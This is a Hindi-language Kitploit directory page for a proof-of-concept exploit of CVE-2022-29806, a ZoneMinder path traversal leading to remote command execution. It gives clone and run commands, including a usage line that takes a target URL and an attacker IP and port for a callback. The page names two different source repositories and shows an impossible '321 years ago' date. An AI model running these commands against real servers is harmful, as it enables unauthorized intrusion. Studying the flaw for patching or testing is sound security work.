Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-29806 — ZoneMinder 1.36.12 तक भाषा विशेषाधिकार वृद्धि (और RCE) - Poc शोषण | Kitploit
उपकरण/GitHubGitHub/sigm0n/cve-2022-29806
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder 1.36.12 तक भाषा विशेषाधिकार वृद्धि (और RCE) - Poc शोषण

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-29806

ZoneMinder 1.36.12 तक भाषा विशेषाधिकार वृद्धि (और RCE)

alt img

विवरण

ZoneMinder के 1.36.13 और 1.37.11 से पहले के संस्करण में डीबग लॉग फ़ाइल और डिफ़ॉल्ट भाषा विकल्प में एक पथ ट्रैवर्सल कमजोरी हमलावरों को रिमोट कमांड निष्पादन प्राप्त करने के लिए मनमाना कोड लिखने और निष्पादित करने की अनुमति देती है।

"प्रूफ ऑफ कॉन्सेप्ट का परीक्षण ZoneMinder 1.36.4 ubuntu18.04 डॉकर: ZoneMinder/zmdockerfiles के विरुद्ध किया गया था, लेकिन यह अभी भी नवीनतम संस्करण 1.36.12 तक लागू होगा।"

उपयोग

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

आवश्यकताएँ

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

श्रेय

krastanoel ने कमजोरी की खोज की।

टूल डाउनलोड करें